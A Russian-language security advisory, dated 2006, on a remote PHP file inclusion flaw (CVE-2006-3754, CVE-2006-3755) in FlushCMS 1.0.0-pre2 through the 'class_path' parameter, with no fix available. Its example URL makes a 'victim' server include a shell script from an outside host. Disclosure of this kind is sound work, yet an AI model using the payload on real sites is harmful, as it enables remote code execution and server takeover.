Security Lab

PHP-инклюдинг в FlushCMS

Дата публикации:17.07.2006
Дата изменения:17.10.2006
Всего просмотров:1275
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2006-3754
CVE-2006-3755
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: FlushCMS 1.x
Уязвимые версии: FlushCMS 1.0.0-pre2, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "class_path" в сценариях Include/editor/rich_files/class.rich.php и Include/editor/class.rich.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://victim/flushcmd/Include/editor/rich_files/class.rich.php?class_path=http://www.shell.com/shell.txt?

URL производителя: flushcms.518ic.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: flushcms (tpath) Remote File Inclusion Vulnerability